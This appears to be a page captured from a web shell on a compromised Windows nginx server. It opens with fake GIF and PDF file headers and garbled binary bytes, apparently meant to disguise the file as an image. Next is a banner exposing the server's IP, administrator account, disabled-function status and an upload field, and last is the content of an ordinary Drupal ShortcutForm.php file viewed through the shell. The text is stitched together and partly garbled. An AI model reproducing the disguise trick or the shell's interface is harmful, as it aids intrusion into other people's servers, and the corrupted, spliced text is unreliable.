GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Student/JimMartinson/Lab12/drupal/core/modules/shortcut/src/ |
Upload File : |
<?php namespace Drupal\shortcut; use Drupal\Core\Entity\ContentEntityForm; use Drupal\Core\Form\FormStateInterface; /** * Form handler for the shortcut entity forms. */ class ShortcutForm extends ContentEntityForm { /** * The entity being used by this form. * * @var \Drupal\shortcut\ShortcutInterface */ protected $entity; /** * {@inheritdoc} */ public function save(array $form, FormStateInterface $form_state) { $entity = $this->entity; $status = $entity->save(); $url = $entity->getUrl(); // There's an edge case where a user can have permission to // 'link to any content', but has no right to access the linked page. So we // check the access before showing the link. if ($url->access()) { $view_link = \Drupal::l($entity->getTitle(), $url); } else { $view_link = $entity->getTitle(); } if ($status == SAVED_UPDATED) { $message = $this->t('The shortcut %link has been updated.', ['%link' => $view_link]); } else { $message = $this->t('Added a shortcut for %title.', ['%title' => $view_link]); } drupal_set_message($message); $form_state->setRedirect( 'entity.shortcut_set.customize_form', ['shortcut_set' => $entity->bundle()] ); } }